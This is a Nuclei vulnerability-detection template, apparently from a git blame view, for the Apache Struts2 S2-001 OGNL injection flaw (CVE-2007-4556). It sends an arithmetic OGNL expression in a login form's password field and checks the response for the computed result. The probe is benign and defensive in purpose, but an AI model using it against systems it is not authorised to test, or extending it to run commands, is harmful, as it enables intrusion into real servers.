nuclei-templates/cves/2007/CVE-2007-4556.yaml

30 lines
574 B
YAML
Raw Normal View History

2021-02-21 13:57:34 +00:00
id: CVE-2007-4556
info:
name: Apache Struts2 S2-001 RCE
author: pikpikcu
severity: critical
reference: https://www.guildhab.top/?p=2326
2021-02-22 07:01:32 +00:00
tags: cve,cve2007,apache,rce,struts
2021-02-21 13:57:34 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/login.action"
headers:
2021-02-21 20:18:07 +00:00
Content-Type: application/x-www-form-urlencoded
2021-02-21 13:57:34 +00:00
body: |
username=test&password=%25%7B123456789*987654321%7D
matchers-condition: and
matchers:
- type: word
words:
- "-67153019"
condition: and
- type: status
status:
- 200